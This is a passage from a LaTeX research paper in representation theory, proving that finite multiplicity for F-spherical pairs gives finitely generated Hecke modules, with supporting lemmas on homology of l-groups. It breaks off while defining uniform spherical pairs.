\begin{proof}[Proof of Lemma \ref{FinMultCuspDesc}]
$ $\\
(i) is trivial.\\
(ii) Let $P<G$ be a parabolic subgroup, $M$ be the Levi quotient
of $P$ and let $\rho$ be a cuspidal representation of $M(F)$. We
know that $\dim (i_{GM}\rho)_{H(F)}< \infty$ and we have to show
that $\dim \rho_{H_M(F)}< \infty$.
Let $\mathcal{I}$ denote the natural $G(F)$-equivariant \nir{locally constant sheaf of complex vector spaces} on
$G(F)/P(F)$ such that $i_{GM}\rho \cong {\mathcal S}(G(F)/P(F),
$\mathcal{I})$. Let $Y_j$ denote the $H(F)$-orbits on $G(F)/P(F)$.
We know that there exists a natural filtration on ${\mathcal S}(G(F)/P(F),
\mathcal{I})|_{H(F)}$ with associated graded components isomorphic
to ${\mathcal S}(Y_j,\mathcal{I}_j)$, where $\mathcal{I}_j$ are the $H(F)$-equivariant
sheaves on $Y_j$ corresponding to $\mathcal{I}$. For
any $j$ choose a representative $y_j \in Y_j$, in such a way
that $y_{j_0}=[1]$ for some index $j_0$. Let
$P_j:=G_{y_j}$ and $M_j$ be its Levi quotient. Note that $P_{j_0} = P$ and
$M_{j_0} = M$. Let $\rho_j$ be the stalk of $\mathcal{I}_j$ at the
point $y_j$. Clearly $\rho_j$ is a cuspidal irreducible
representation of $M_j(F)$ and $\rho_{j_0}=\rho$. By Shapiro's Lemma
(Lemma \ref{LemShap}), $$\operatorname{H}_i(H(F),{\mathcal S}(Y_j,\mathcal{I}_j)) \cong
\operatorname{H}_i((H \cap P_j)(F), \rho_j).$$
By Lemma \ref{FinDimH1H0} either $\dim \operatorname{H}_0((H \cap P_j)(F),
\rho_j) = \infty$ or both $\dim \operatorname{H}_0((H \cap P_j)(F), \rho_j) <
\infty$ and $\dim \operatorname{H}_1((H \cap P_j)(F), \rho_j) < \infty$. Hence,
by Lemma \ref{LinAlg}, $\dim \operatorname{H}_0((H \cap P_j)(F), \rho_j) <
\infty$ for every $j$; taking $j=j_0$, we obtain $\dim \rho_{H_M(F)}< \infty$.
\end{proof}
\subsection{Proof of Theorem \ref{IntFinGen}} \lbl{SecPfFinGen} $ $
In this subsection we prove Theorem \ref{IntFinGen}. Let us recall
its formulation.
\begin{theorem} \lbl{FinGen}
Let $(G,H)$ be an $F$-spherical pair. Suppose that for any
irreducible smooth representation $\rho$ of $G(F)$ we have
\begin{equation} \lbl{FinMult}
\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) < \infty .
\end{equation}
Then for any \Dima{compact open}
subgroup $K<G(F)$, ${\mathcal S}(G(F)/H(F))^K$ is a
finitely generated module over the Hecke algebra
$\mathcal{H}_K(G(F))$.
\end{theorem}
\begin{remark}
Conjecturally, any $F$-spherical pair satisfies the condition
(\ref{FinMult}). In \cite{Del} and in \cite{SV} this is proven for
wide classes of spherical pairs, which include all symmetric pairs
over fields of characteristic different from 2.
\end{remark}
We will need several lemmas and definitions.
\nir{
\begin{lemma} \lbl{G1}
Let $(G,H)$ be an $F$-spherical pair, and denote $\widetilde{H}=H(F)Z(G(F))\cap G^1$.
Suppose that for any smooth
(respectively cuspidal) irreducible representation $\rho$ of
$G(F)$ we have $\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) < \infty$. Then
for any smooth (respectively cuspidal) irreducible representation
$\rho$ of $G(F)$ and for every character $\widetilde{\chi}$ of $\widetilde{H}$ whose restriction to $H(F)\cap G^1$ is trivial, we have
$$\dim\Hom_{\widetilde{H}}(\rho|_{\widetilde{H}}, \widetilde{\chi}) < \infty.$$
\end{lemma}
}
\begin{proof}
\nir{
Let $\rho$ be a smooth (respectively cuspidal) irreducible
representation of $G(F)$, and let $\widetilde{\chi}$ be a character of $\widetilde{H}$ whose restriction to $H(F)\cap G^1$ is trivial.
\[
\Hom_{\widetilde{H}}\left (\rho|_{\widetilde{H}}, \widetilde{\chi} \right ) =
\Hom_{(H(F) Z(G(F)))\cap G_0} \left (\rho|_{(H(F) Z(G(F)))\cap G_0}, Ind_{\widetilde{H}}^{(H(F) Z(G(F)))\cap G_0}\widetilde{\chi}\right) .
\]
Since $$H(F)Z(G(F))\cap G_0=\widetilde{H}Z(G(F))\cap G_0=\widetilde{H}Z(G(F)),$$
the subspace of $Ind_{\widetilde{H}}^{(H(F) Z(G(F)))\cap G_0}\widetilde{\chi}$ that transforms under $Z(G(F))$ according to the central character of $\rho$ is at most one dimensional. If this subspace is trivial, then the lemma is clear. Otherwise, denote it by $\tau$. Since $H(F)\cap G^1$ is normal in $H(F)Z(G(F))$, we get that the restriction of $Ind_{\widetilde{H}}^{(H(F) Z(G(F)))\cap G_0}\widetilde{\chi}$ to $H(F)\cap G^1$ is trivial, and hence that $\tau|_{H(F)\cap G^1}$ is trivial. Hence $\Hom_{\widetilde{H}}\left (\rho|_{\widetilde{H}}, \widetilde{\chi} \right )$ is equal to
\[
\Hom_{(H(F) Z(G(F)))\cap G_0} \left (\rho|_{(H(F) Z(G(F)))\cap G_0}, \tau\right)=\Hom_{H(F)\cap G_0} \left (\rho|_{H(F) \cap G_0}, \tau|_{H(F)\cap G_0}\right)=
\]
\[
=\Hom_{H(F)}\left(\rho|_{H(F)},Ind_{H(F)\cap G_0}^{H(F)}\tau|_{H(F)\cap G_0}\right).
\]
Since $H(F) / (H(F)\cap G_0)$ is finite and abelian, the representation $Ind_{H(F)\cap G_0}^{H(F)}\tau|_{H(F)\cap G_0}$ is a finite direct sum of characters of $H(F)$, all of whose restrictions to $H(F)\cap G^1$ are trivial. Any character $\theta$ of $H(F)$ whose restriction to $H(F)\cap G^1$ is trivial can be extended to a character of $G(F)$, because $H(F)/(H(F)\cap G^1)$ is a sub-lattice of $G(F)/G^1$. Denoting the extension by $\Theta$, we get that
\[
\Hom_{H(F)}\left(\rho|_{H(F)},\theta\right)=\Hom_{H(F)}\left((\rho\otimes\Theta^{-1})|_{H(F)},\mathbb C\right),
\]
but $\rho\otimes\Theta^{-1}$ is again a smooth (respectively cuspidal) irreducible representation of $G(F)$, so this last space is finite-dimensional.
}
\end{proof}
\Rami{
\begin{lemma} \lbl{CA}
Let $A$ be a commutative unital Noetherian algebra without zero divisors and let $K$ be its field of fractions. Let $K^\mathbb N$ be the space of all sequences of elements of $K$. Let $V$ be a finite dimensional subspace of $K^\mathbb N$ and let $M:=V \cap A^\mathbb N$. Then $M$ is finitely generated.
\end{lemma}
\nir{
\begin{proof} Since $A$
\Rami{
does not have zero divisors}, $M$ injects into $K^\mathbb N$. There is a number $n$ such that the projection of $V$ to $K^{\{1,\ldots n\}}$ is injective. Therefore, $M$ injects into $A^{\{1,\ldots n\}}$, and, since $A$ is Noetherian, $M$ is finitely generated.
\end{proof}
}
\nir{
\begin{lemma} \lbl{fg}
Let $M$ be an $l$-group, let $L\subset M$ be a closed subgroup, and let $L' \subset L$ be an open normal subgroup of $L$ such that $L/L'$ is a lattice. Let $\rho$ be a smooth representation of $M$ of countable dimension. Suppose that for any character $\chi$ of $L$ whose restriction to $L'$ is trivial we have $$\dim\Hom_{L}(\rho|_{L}, \chi) < \infty.$$
Consider $\Hom_{L'}(\rho, {\mathcal S}(L/L'))$ as a representation of $L$, where $L$ acts by $((hf)(x))([y])=(f(x))([y h])$. Then this representation is finitely generated. \end{lemma}
\begin{proof} By assumption, the action of $L$ on $\Hom_{L'}(\rho,{\mathcal S}(L/L'))$ factors through $L/L'$. Since $L/L'$ is discrete, ${\mathcal S}(L/L')$ is the group algebra $\mathbb C[L/L']$. We want to show that $\Hom_{L'}(\rho,\mathbb C[L/L'])$ is a finitely generated module over $\mathbb C[L/L']$.
Let $\mathbb C(L/L')$ be the fraction field of $\mathbb C[L/L']$. Choosing a countable basis for the vector space of $\rho$, we can identify any $\mathbb C$-linear map from $\rho$ to $\mathbb C[L/L']$ with an element of $\mathbb C[L/L']^\mathbb N$. Moreover, the condition that the map intertwines the action of $L/L'$ translates into a collection of linear equations that the tuple in $\mathbb C[L/L']^\mathbb N$ should satisfy. Hence, $\Hom_{L'}(\rho,\mathbb C[L/L'])$ is the intersection of the $\mathbb C(L/L')$-vector space $\Hom_{L'}(\rho,\mathbb C(L/L'))$ and $\mathbb C[L/L']^\mathbb N$. By Lemma \ref{CA}, it suffices to prove that $\Hom_{L'}(\rho,\mathbb C(L/L'))$ is finite dimensional over $\mathbb C(L/L')$.
Since
\Dima{$L'$ is separable, and $\rho$ is smooth and of countable dimension,}
there are only countably many linear equations defining $\Hom_{L'}(\rho,\mathbb C(L/L'))$; denote them by $\phi_1,\phi_2,\ldots\in\left(\mathbb C(L/L')^\mathbb N\right)^*$. Choose a countable subfield $K\subset\mathbb C$ that contains all the coefficients of the elements of $\mathbb C(L/L')$ that appear in any of the $\phi_i$'s. If we define $W$ as the
\Rami{
$K(L/L')$}-linear subspace of
\Rami{
$K(L/L')^\mathbb N$}
\Dima{defined} by the $\phi_i$'s, then $\Hom_{L'}(\rho,\mathbb C(L/L'))=W\otimes_{K(L/L')} \mathbb C(L/L')$, so $\dim_{\mathbb C(L/L')}\Hom_{L'}(\rho,\mathbb C(L/L'))=\dim_{K(L/L')}W$.
Since $L/L'$ is a lattice generated by, say, $g_1,\ldots,g_n$, we get that $K(L/L')=K(t_1^{\pm 1},\ldots,t_n^{\pm 1})$ \Rami{$=K(t_1,\ldots,t_n)$}. Choosing elements $\pi_1,\ldots,\pi_n\in\mathbb C$ such that $tr.deg_K(K(\pi_1,\ldots,\pi_n))=n$, we get an injection $\iota$ of
$K(L/L')$ into $\mathbb C$. As before, we get that if we denote by $U$ the $\mathbb C$-vector subspace of $\mathbb C^\mathbb N$ cut out by the equations $\iota(\phi_i)$, then $\dim_{K(L/L')}W=\dim_{\mathbb C}U$. However, $U$ is isomorphic to $\Hom_{L'}(\rho,\chi)$, where $\chi$ is the character \Rami{of $L/L'$} such that $\chi(g_i)=\pi_i$. By assumption, this last vector space is finite dimensional.
\end{proof}}
}
Now we are ready to prove Theorem \ref{FinGen}.
\begin{proof}[Proof of Theorem \ref{FinGen}]
By Lemma \ref{VKFinGen} it is enough to show that for any
parabolic $P<G$ and any irreducible cuspidal representation $\rho$
of $M(F)$ (where $M$ denotes the Levi quotient of $P$),
$\Hom_{G(F)}(i_{GM}(\Psi(\rho)),{\mathcal S}(G(F)/H(F)))$ is a finitely generated
module over $\mathcal O(\Psi_M)$.
\Rami{
Step 1. Proof for the case $P=G$.\\
We have
$$\Hom_{G(F)}(i_{GM}(\Psi(\rho)),{\mathcal S}(G(F)/H(F)))=
\Hom_{G(F)}(\Psi(\rho),{\mathcal S}(G(F)/H(F))) =
\Hom_{G^1}(\rho,{\mathcal S}(G(F)/H(F))).$$
Here we consider the space $\Hom_{G^1}(\rho,{\mathcal S}(G(F)/H(F)))$ with
the natural action of $G$. Note that $G^1$ acts trivially and
hence this action gives rise to an action of $G(F)/G^1$, which gives
the $\mathcal O(\Psi_G)$-module structure.
Now consider the subspace $$V:=\Hom_{G^1}(\rho,{\mathcal S}(G^1/(H(F) \cap
G^1))) \subset \Hom_{G^1}(\rho,{\mathcal S}(G(F)/H(F))).$$ It generates
$\Hom_{G^1}(\rho,{\mathcal S}(G(F)/H(F)))$ as a representation of $G(F)$,
and therefore also as an $\mathcal O(\Psi_G)$-module. Note that $V$ is $H(F)$-invariant. Therefore it is enough to show that $V$ is finitely generated over $H(F)$.
Denote $H':=H(F) \cap
G^1$ and $H'':= (H(F) Z(G(F)))\cap G^1$.
Note that $${\mathcal S}(G^1/H') \cong ind_{H''}^{G^1}({\mathcal S}(H''/H')) \subset Ind_{H''}^{G^1}({\mathcal S}(H''/H')).$$ Therefore $V$ is canonically embedded into $\Hom_{H''}(\rho,{\mathcal S}(H''/H'))$. The action of $H$ on $V$ extends naturally to an action $\Pi$ on $\Hom_{H''}(\rho,{\mathcal S}(H''/H'))$ given by $$((\Pi(h)(f))(v))([k])=f(h^{-1}v)([h^{-1}kh]).$$ Let $\Xi$ be the action of $H''$ on $\Hom_{H''}(\rho,{\mathcal S}(H''/H'))$ described in Lemma \Dima{\ref{fg}}, i.e. $$((\Xi(h)(f))(v))([k])=f(v)([kh]).$$ By Lemmas \Dima{\ref{fg}} and \Dima{\ref{G1}}, it is enough to show that for any $h \in H''$ there exist $h' \in H$ and a scalar $\alpha$ such that $$\Xi(h)=\alpha \Pi(h').$$ In order to show this, decompose $h$ as a product $h=zh'$, where $h' \in H$ and $z\in Z(G(F))$. Now
\begin{multline*}
((\Xi(h)(f))(v))([k])=f(v)([kh])=f(h^{-1}v)([h^{-1}kh])=f(h^{'-1}z^{-1}v)([h^{'-1}kh'])=\\=
\alpha f(h'^{-1}v)([h^{'-1}kh'])= \alpha((\Pi(h')(f))(v))([k]),
\end{multline*}
where $\alpha$ is the scalar with which
$z^{-1}$ acts on $\rho$.}
\Rami{Step 2}. Proof in the general case.
\nir{
\begin{multline*}
\Hom_{G(F)}(i_{GM}(\Psi(\rho)),{\mathcal S}(G(F)/H(F)))=
\Hom_{M(F)}(\Psi(\rho),\overline{r}_{MG}({\mathcal S}(G(F)/H(F)))) = \\ =
\Hom_{M(F)}(\Psi(\rho),(({\mathcal S}(G(F)/H(F)))|_{\overline{P}(F)})_{\overline{U}(F)}),
\end{multline*}
where $\overline{U}$ is the unipotent radical of $\overline{P}$, the parabolic opposite to $P$. Let $\{Y_i\}_{i=1}^n$
be the orbits of $\overline{P}(F)$ on $G(F)/H(F)$. We know that there exists
a filtration on $({\mathcal S}(G(F)/H(F)))|_{\overline{P}(F)}$ such that the
associated graded components are isomorphic to ${\mathcal S}(Y_i)$.
Consider the corresponding filtration on
$(({\mathcal S}(G(F)/H(F)))|_{\overline{P}(F)})_{\overline{U}(F)}$. Let $V_i$ be the associated
graded components of this filtration. We have a natural surjection
${\mathcal S}(Y_i)_{\overline{U}(F)} \twoheadrightarrow V_i$. In order to prove that
$\Hom_{\Dima{M}(F)}(\Psi(\rho),(({\mathcal S}(G(F)/H(F)))|_{\overline{P}(F)})_{\overline{U}(F)})$ is
finitely generated it is enough to prove that
$\Hom_{M(F)}(\Psi(\rho),V_i)$ is finitely generated. Since
$\Psi(\rho)$ is a projective object of $\mathcal M(M(F))$ (by Corollary
\ref{CuspProj}), it is enough to show that
$\Hom_{M(F)}(\Psi(\rho),{\mathcal S}(Y_i)_{\overline{U}(F)})$ is finitely generated. Denote
$Z_i := \overline{U}(F) \setminus Y_i $. It is easy to see that $Z_i \cong
M(F)/ ((H_i)_M(F))$, where $H_i$ is some conjugate of $H$.
}
Now the assertion follows from the previous step using Lemma
\ref{FinMultCuspDesc}.
\end{proof}
\subsection{Homologies of $l$-groups}\lbl{subsec:homologies}$ $
The goal of this subsection is to prove Lemma \ref{FinDimH1H0} and
Lemma \ref{LemShap}.
We start with some generalities on abelian categories.
\begin{definition}
Let $\mathcal C$ be an abelian category. We call a family of objects $\mathcal A
\subset Ob(\mathcal C)$ a \textbf{generating} family if for any object $X
\in Ob(\mathcal C)$ there exist an object $Y \in \mathcal A$ and an epimorphism
$Y \twoheadrightarrow X$.
\end{definition}
\begin{definition}
Let $\mathcal C$ and $\mathcal D$ be abelian categories and $\mathcal F: \mathcal C \to \mathcal D$
be a right-exact additive functor. A family of objects $\mathcal A
\subset Ob(\mathcal C)$ is called \textbf{$\mathcal F$-adapted} if it is
generating
\Rami{, closed under direct sums,
and such that for any exact sequence $0 \to A_1 \to A_2 \to ...
$ with $A_i \in \mathcal A$, the sequence $0 \to \mathcal F(A_1) \to \mathcal F(A_2) \to...$ is also exact.
}
\Dima{For example,
\Rami{a generating system that is
closed under direct sums and consists of}
projective objects
is $\mathcal F$-adapted for any \Dima{right-exact}
functor $\mathcal F$.}
\Rami{For an $l$-group $G$, the system consisting of direct sums of copies of ${\mathcal S}(G)$ is an example of such a system.}
\end{definition}
The following results are well-known.
\begin{theorem}
Let $\mathcal C$ and $\mathcal D$ be abelian categories and $\mathcal F: \mathcal C \to \mathcal D$
be a right-exact additive functor. Suppose that there exists an
$\mathcal F$-adapted family $\mathcal A \subset Ob(\mathcal C)$. Then $\mathcal F$ has derived
functors.
\end{theorem}
\begin{lemma} \lbl{HomLeib}
Let $\mathcal A$, $\mathcal B$ and $\mathcal C$ be abelian categories. Let $\mathcal F:\mathcal A \to
\mathcal B$ and $\mathcal G:\mathcal B \to \mathcal C$ be right-exact additive functors.
Suppose that both $\mathcal F$ and $\mathcal G$ have derived functors.\\
(i) Suppose that $\mathcal F$ is exact. Suppose also that there exists a
class $\mathcal E \subset Ob(\mathcal A)$ which is $\mathcal G \circ \mathcal F$-adapted and
such that $\mathcal F(X)$ is $\mathcal G$-acyclic for any $X \in \mathcal E$. Then \nir{the functors $L^i(\mathcal G \circ \mathcal F)$ and $L^i\mathcal G \circ \mathcal F$ are isomorphic.}\\
(ii) Suppose that there exists a class $\mathcal E \subset Ob(\mathcal A)$ which
is $\mathcal G \circ \mathcal F$-adapted and $\mathcal F$-adapted and such that
$\mathcal F(X)$ is $\mathcal G$-acyclic for any $X \in \mathcal E$. Let $Y \in \mathcal A$ be
an $\mathcal F$-acyclic object. Then \nir{$L^i(\mathcal G \circ \mathcal F)(Y)$ is (naturally) isomorphic to $L^i\mathcal G(\mathcal F(Y))$.}\\
(iii) Suppose that $\mathcal G$ is exact. Suppose that there exists a
class $\mathcal E \subset Ob(\mathcal A)$ which is $\mathcal G \circ \mathcal F$-adapted and
$\mathcal F$-adapted. Then \nir{the functors $L^i(\mathcal G \circ \mathcal F)$ and $\mathcal G \circ L^i\mathcal F$ are isomorphic.}
\end{lemma}
\begin{definition}
Let $G$ be an $l$-group. For any smooth representation $V$ of $G$ denote $\operatorname{H}_i(G, V):=L^iCI_G(V)$.
Recall that $CI_G$ denotes the coinvariants functor.
\end{definition}
\begin{proof}[Proof of Lemma \ref{LemShap}]
Note that $\mathcal F(X) = ind_{G_x}^G \mathcal F_x$. Note also that
$ind_{G_x}^G$ is an exact functor, and $CI_{G_x} = CI_{G} \circ
ind_{G_x}^G$. The lemma follows now from Lemma \ref{HomLeib}(i).
\end{proof}
\begin{lemma} \lbl{AFG}
Let $L$ be a \nir{lattice.}
Let $V$ be a linear
space. Let $L$ act on $V$ by a character. Then
$$\operatorname{H}_1(L,V) = \operatorname{H}_0(L,V) \otimes_{\mathbb C}(L \otimes_{\mathbb Z}\mathbb C).$$
\end{lemma}
The proof of this lemma is straightforward.
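\begin{remark}
As an illustration, consider the rank one case: let $L=\mathbb Z$ with generator $g$ act on $V$ by a character $\chi$. Then the homology of $L$ with coefficients in $V$ is computed by the complex
$$0 \to V \xrightarrow{\chi(g)-1} V \to 0,$$
so $\operatorname{H}_0(L,V)=V/(\chi(g)-1)V$ and $\operatorname{H}_1(L,V)=\operatorname{Ker}(\chi(g)-1)$. If $\chi$ is trivial, both spaces equal $V$; otherwise $\chi(g)-1$ acts by a non-zero scalar and both spaces vanish. In either case $\operatorname{H}_1(L,V) = \operatorname{H}_0(L,V) \otimes_{\mathbb C}(L \otimes_{\mathbb Z}\mathbb C)$, since here $L \otimes_{\mathbb Z}\mathbb C \cong \mathbb C$. The general case follows in the same way from the Koszul complex of $L$.
\end{remark}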
\begin{lemma} \lbl{HomCoinv}
Let $L$ be an $l$-group and $L'<L$ be a subgroup. Then\\
(i) for any representation $V$ of $L$ we have
$$\operatorname{H}_i(L',V)=L^i\mathcal{F}(V),$$ where $\mathcal{F}: \mathcal M(L) \to
Vect$ is the functor defined by $\mathcal{F}(V)=V_{L'}$.\\
(ii) Suppose that $L'$ is normal. Let $\mathcal{F'}: \mathcal M(L) \to
\mathcal M(L/L')$ be the functor defined by $\mathcal{F'}(V)=V_{L'}$. Then
for any representation $V$ of $L$ we have
$\operatorname{H}_i(L',V)=L^i\mathcal{F'}(V).$
\end{lemma}
\begin{proof}
(i) Consider the restriction functor $Res_{L'}^L: \mathcal M(L) \to
\mathcal M(L')$. Note that it is exact. Consider also the functor
$\mathcal G:\mathcal M(L') \to Vect$ defined by $\mathcal G(\rho):=\rho_{L'}$. Note
that $\mathcal F=\mathcal G \circ Res_{L'}^L$. The
\Rami{assertion}
follows now from Lemma
\ref{HomLeib}(i)
\Rami{using the fact that ${\mathcal S}(L)$ is a projective object in $\mathcal M(L')$}.\\
(ii) follows from (i) in a similar way, but using part (iii) of
Lemma \ref{HomLeib} instead of part (i).
\end{proof}
\begin{lemma} \lbl{CuspAcyc}
Let $G$ be a reductive group and $H<G$ be a subgroup. Consider the
functor $$\mathcal{F}: \mathcal M(G(F)) \to \mathcal M(H(F)/(H(F)\cap G^1))
\text{ defined by }\mathcal{F}(V)=V_{H(F)\cap G^1}.$$ Then any \nir{finitely generated}
cuspidal representation of $G(F)$ is an $\mathcal{F}$-acyclic
object.
\end{lemma}
\begin{proof}
Consider the restriction functors $$Res_{1}^{H(F)/(H(F)\cap G^1)}:
\mathcal M(H(F)/(H(F)\cap G^1)) \to Vect$$ and $$Res_{G^1}^{G(F)}:
\mathcal M(G(F)) \to \mathcal M(G^1).$$ Note that they are exact. Consider also
the functor $\mathcal G:\mathcal M(G^1) \to Vect$ defined by
$\mathcal G(\rho):=\rho_{G^1 \cap H(F)}$. Denote $\mathcal E:= \mathcal G \circ
Res_{G^1}^{G(F)}$. Note that $\mathcal E= Res_{1}^{H(F)/(H(F)\cap G^1)}
\circ \mathcal F$.
$$\xymatrix{\parbox{40pt}{$\mathcal M(G(F))$}\ar@{->}^{\mathcal F \quad \quad
\quad \quad}[r]\ar@{->}^{\mathcal E}[dr]\ar@{->}_{Res_{G^1}^{G(F)} }[d] &
\parbox{110pt}{$\mathcal M(H(F)/(H(F)\cap
G^1))$}\ar@{->}^{Res_{1}^{H(F)/(H(F)\cap G^1)}}[d]\\
\parbox{30pt}{$\mathcal M(G^1)$}\ar@{->}^{\mathcal G}[r] &
\parbox{25pt}{$Vect$}}$$
Let $\pi$ be a cuspidal finitely generated representation of $G(F)$. By Corollary
\ref{CuspProj}, $Res_{G^1}^{G(F)}(\pi)$ is projective and hence
$\mathcal G$-acyclic. Hence by Lemma \ref{HomLeib}(ii) $\pi$ is
$\mathcal E$-acyclic. Hence by Lemma \ref{HomLeib}(iii) $\pi$ is
$\mathcal F$-acyclic.
\end{proof}
\begin{lemma} \lbl{HomQGroups}
Let $L$ be an l-group and $L'<L$ be a normal subgroup. Suppose
that $\operatorname{H}_i(L',\mathbb C)=0$ for all $i>0$. Let $\rho$ be a
representation of $L/L'$. Denote by $Ext(\rho)$ the natural
representation of $L$ obtained from $\rho$. Then
$\operatorname{H}_i(L/L',\rho)=\operatorname{H}_i(L,Ext(\rho))$.
\end{lemma}
\begin{proof}
Consider the coinvariants functors $\mathcal E: \mathcal M(L) \to Vect$ and
$\mathcal F: \mathcal M(L/L') \to Vect$ defined by $\mathcal E(V):=V_L$ and
$\mathcal F(V):=V_{L/L'}$. Note that $\mathcal F = \mathcal E \circ Ext$ and $Ext$ is
exact. By Shapiro's Lemma (Lemma \ref{LemShap}), ${\mathcal S}(L/L')$ is acyclic with respect to
both $\mathcal E$ and $\mathcal F$. The lemma follows now from Lemma
\ref{HomLeib}(ii).
\end{proof}
\begin{remark}
Recall that if $L'=N(F)$, where $N$ is a unipotent algebraic group,
then $\operatorname{H}_i(L',\mathbb C)=0$ for all $i>0$.
\end{remark}
Now we are ready to prove Lemma \ref{FinDimH1H0}.
\begin{proof}[Proof of Lemma \ref{FinDimH1H0}]
By Lemma \ref{HomQGroups} we can assume that $G$ is reductive.
Let $\mathcal F:\mathcal M(G(F)) \to Vect$ be the functor defined by
$\mathcal F(V):=V_{H(F)}.$ Let $$\mathcal G:\mathcal M(G(F)) \to \mathcal M(H(F)/(H(F)\cap
G^1))$$ be defined by $$\mathcal G(V):=V_{H(F)\cap G^1}.$$ Let
$$\mathcal E:\mathcal M(H(F)/(H(F)\cap G^1)) \to Vect$$ be defined by
$$\mathcal E(V):=V_{H(F)/(H(F)\cap G^1)}.$$ Clearly, $\mathcal F=\mathcal E \circ \mathcal G$.
By Lemma \ref{CuspAcyc}, $\rho$ is $\mathcal G$-acyclic. Hence by Lemma
\ref{HomLeib}(ii), $L^i\mathcal F(\rho)=L^i\mathcal E(\mathcal G(\rho))$.
$$\xymatrix{\parbox{40pt}{$\mathcal M(G(F))$}\ar@{->}^{\mathcal G \quad \quad \quad \quad}[r] \ar@/^3pc/@{->}^{\mathcal F}[rrr] &
\parbox{105pt}{$\mathcal M(H(F)/(H(F)\cap G^1))$}\ar@/^2pc/@{->}^{\mathcal E}[rr]\ar@{->}^{\mathcal K}[r] &
\parbox{105pt}{$\mathcal M(H(F)/(H(F)\cap G^0))$} \ar@{->}^{\quad \quad \quad \quad \mathcal C}[r] &
\parbox{25pt}{$Vect$}}$$
Consider the coinvariants functors $\mathcal K: \mathcal M(H(F)/(H(F)\cap G^1))
\to \mathcal M(H(F)/(H(F)\cap G^0))$ and $\mathcal C:\mathcal M(H(F)/(H(F)\cap G^0))
\to Vect$ defined by $\mathcal K(\rho):=\rho_{(H(F) \cap G_0)/(H(F)\cap
G^1)}$ and $\mathcal C(\rho):=\rho_{H(F)/(H(F)\cap G^1)}$. Note that $\mathcal E
= \mathcal C \circ \mathcal K$.
Note that
$\mathcal C$ is exact since the group $H(F)/(H(F)\cap G^1)$ is finite.
Hence by Lemma \ref{HomLeib}(iii), $L^i\mathcal E = \mathcal C \circ L^i\mathcal K$.
Now, by Lemma \ref{HomCoinv},
$$\operatorname{H}_i(H(F),\rho)=L^i\mathcal F(\rho)=L^i\mathcal E(\mathcal G(\rho))=
\mathcal C(L^i\mathcal K(\mathcal G(\rho)))=\mathcal C(\operatorname{H}_i((H(F) \cap G_0)/(H(F)\cap
G^1),\mathcal G(\rho))).$$
Hence, by Lemma \ref{AFG}, if $\operatorname{H}_0(H(F),\rho)$ is finite
dimensional then $\operatorname{H}_1(H(F),\rho)$ is finite dimensional.
\end{proof}
\section{Uniform Spherical Pairs} \lbl{sec:UniSPairs}
In this section we introduce the notion of uniform spherical pair
and prove Theorem \ref{thm:ModIso}.
\Dima{We follow the main steps of \cite{Kaz}, where the author constructs an isomorphism between the Hecke algebras of a reductive group over close enough local fields. First, he constructs a linear isomorphism between the Hecke algebras, using the Cartan decomposition. Then, he shows that for any two given elements of the Hecke algebra there exists $m$ such that, if the fields are $m$-close, the product of those elements is mapped to the product of their images. Finally, he uses the fact that the Hecke algebras are finitely generated and finitely presented to deduce the theorem.}
\Dima{Roughly speaking, we call a pair $H<G$ of reductive groups a uniform spherical pair if it possesses a relative analog of the Cartan decomposition, i.e. a ``nice'' description of the set of double cosets $K_0(G,F)\setminus G(F) / H(F)$ which, in some sense, does not depend on $F$. We give the precise definition in the first subsection and prove Theorem \ref{thm:ModIso} in the second subsection.}
\subsection{Definitions} \lbl{subsec:UniSpairs}$ $
Let $R$ be a complete and smooth local ring, let $m$ denote its maximal ideal, and let $\pi$ be an element in $m\setminus m^2$. A good example to keep in mind is the ring $\mathbb Z_p[[\pi]]$. An $(R,\pi)$-local field is a local field $F$ together with an epimorphism of rings $R\to O_F$, such that the image of $\pi$ (which we will continue to denote by $\pi$) is a uniformizer. Denote the collection of all $(R,\pi)$-local fields by $\mathcal F_{R,\pi}$.
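For example, for $R=\mathbb Z_p[[\pi]]$ the collection $\mathcal F_{R,\pi}$ contains fields of both characteristics: the epimorphism $\mathbb Z_p[[\pi]] \to \mathbb Z_p$ sending $\pi$ to $p$ realizes $\mathbb Q_p$ as an $(R,\pi)$-local field, while the coefficient-wise reduction $\mathbb Z_p[[\pi]] \to \mathbb F_p[[\pi]]$ realizes $\mathbb F_p((\pi))$ as one; in both cases the image of $\pi$ is a uniformizer, as required.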
Suppose that $G$ is a reductive group defined and split over $R$. Let $T$ be a fixed split torus, and let $X_*(T)$ be the coweight lattice of $T$. For every $\lambda\in X_*(T)$ and every $(R,\pi)$-local field $F$, we write $\pi^\lambda=\lambda(\pi)\in T(F)\subset G(F)$. We denote the subgroup $G(O_F)$ by $K_0(F)$, and denote its $\ell$'th congruence subgroup by $K_\ell(F)$.
\begin{defn}
Let $F$ be a local field.
Let $X \subset \mathbb A^n_{O_F}$ be a closed subscheme. For any $x,y\in X(F)$, define the valuative distance between $x$ and $y$ to be $val_F(x,y):=\min\{val_F(x_i-y_i)\}$. Also, for
any $x\in X(F)$, define $val_F(x):=\min\{val_F(x_i)\}$.
The ball of valuative radius $\ell$ around a point $x$ in
$X(F)$
will be denoted by $B(x,\ell)(F)$.
\end{defn}
\begin{defn}\lbl{defn:good.pair}
Let $G$ be a split reductive group defined over $R$ and let $H\subset G$ be a smooth reductive subgroup defined over $R$. We say that the pair $(G,H)$ is uniform spherical if there are
\begin{itemize}
\item An $R$-split torus $T\subset G$,
\item An affine embedding $G/H\hookrightarrow \mathbb A^n$,
\item A finite subset $\mathfrak X\subset G(R)/H(R)$,
\item A subset $\Upsilon\subset X_*(T)$,
\end{itemize} such that
\begin{enumerate}
\item The map $x\mapsto K_0(F)x$ from $\pi^\Upsilon\mathfrak X$ to $K_0(F)\backslash G(F)/H(F)$ is onto for every $F\in\mathcal F_{R,\pi}$. \lbl{cond:1}
\item For every $x,y \in \pi^\Upsilon \mathfrak X\subset (G/H)(R[\pi^{-1}])$, the closure in $G$ of the $R[\pi^{-1}]$-scheme \Dima{$$T_{x,y}:=\{g\in G \times_{\Spec(R)} \Spec(R[\pi^{-1}]) | gx=y\}$$} is smooth over $R$. We denote this closure by $S_{x,y}$.
\lbl{cond:connectors}
\item For every $x \in \pi^\Upsilon \mathfrak X$, the valuation $val_F(x)$ does not depend on $F \in \mathcal F_{R,\pi}.$
\RGRCor{\item There exists $l_0$ such that for any $l>l_0$, any
$F\in\mathcal F_{R,\pi}$, any $x \in \mathfrak X$, and any $\alpha \in
